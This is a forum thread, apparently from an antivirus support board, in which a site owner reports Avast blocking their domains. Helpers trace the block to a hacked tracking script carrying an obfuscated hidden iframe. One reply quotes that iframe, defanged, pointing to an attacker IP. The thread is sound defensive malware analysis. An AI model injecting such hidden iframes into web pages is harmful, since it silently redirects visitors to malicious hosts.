Domains Blacklisted - Please Check False Positive

Hi everybody

We think avast is blacklisting our websites, as it is blocking the entire domains (if web protection is activated).

silvashop.com
avlispub.com
ultramind.ws
silvaremoteviewing.com
siga.org
choose-success.org
espsy.org
silva.supportgroup.ws
silvacourses.com

We are sure this is a false positive, our sites are probably blacklisted but we don’t know why. Can anyone help us to get rid of this trojan/false positive? Thank you very much.

Maybe a member will go the possibility to check the script and html code. So we can say if its hacked or no.

Be patient another reply will can come.

Thank.

Mr.Agent

hello dominateit,

i checked first three websites using an online analyzer and i found this:

http://wepawet.iseclab.org/view.php?hash=bd1635191619c1de182f10a7e8601536&t=1248098797&type=js

http://wepawet.iseclab.org/view.php?hash=2bb2c5e4cc254585af2fd123f700bf60&t=1248098867&type=js

http://wepawet.iseclab.org/view.php?hash=ec9a4edcda3aabc7200639dcfdb14021&t=1248098881&type=js

and also (may its because of this) :

http://wepawet.cs.ucsb.edu/view.php?type=js&hash=0be374079bd158caaa8192ff1adec45c&t=1240531743

all of the websites(which i checked) contains a javascript from 95’DOT’129’DOT’144’DOT’229 may be the reason why webshield is blocking(i have not tried opening in my browser).

HTML:IFrame-EL Trojan, file: hXtp://silvashop.com/affiliate/scripts/track.js
Is what avast says on the few sites I checked.

Hello filter,

you can take look at this,

http://wepawet.iseclab.org/view.php?hash=6427d31756277f7ccf230111ba10f109&t=1248099554&type=js

Most likely this javascript has been hacked and modified.
In the js file there is an obfuscated script at the bottom which contains the malicious Iframe.

See the image below

That what i was guessing. The detection of Avast! is accurate to this. ;D

Thanks for your time guys! :slight_smile:

No problem ;D

Your welcome to post again if you want anything else.

Mr.Agent

Hi dominateit,

They never thought it to be benign:
http://wepawet.iseclab.org/view.php?hash=6427d31756277f7ccf230111ba10f109&t=1248116437&type=js
But it does not seem to redirect somewhere now…
the url 95.129.144.229 seems non-existent, and also seemed blacklisted by Spamhaus…
Hidden IFrame redirect…

EDITED for security reasons by me ...iframe src="hxtp://95.129.144.229/1" WIDTH="0%" HEIGHT="0%" style="hidden" MARGINHEIGHT="0" 
MARGINWIDTH="0" SCROLLING="no" frameborder="0" NORESIZE^^/iframe^
(repeated 1 time) 

See the Bad Stuff Detektor report:
No zeroiframes detected!
Check took 3.16 seconds

(Level: 0) Url checked:
hxtp://silvashop.com
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://silvashop.com/affiliate/scripts/track.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
hxtp://silvashop.com/affiliate/scripts/
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.google-analytics.com/urchin.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://edge.quantserve.com/quant.js
Zeroiframes detected on this site: 0
No ad codes identified

polonus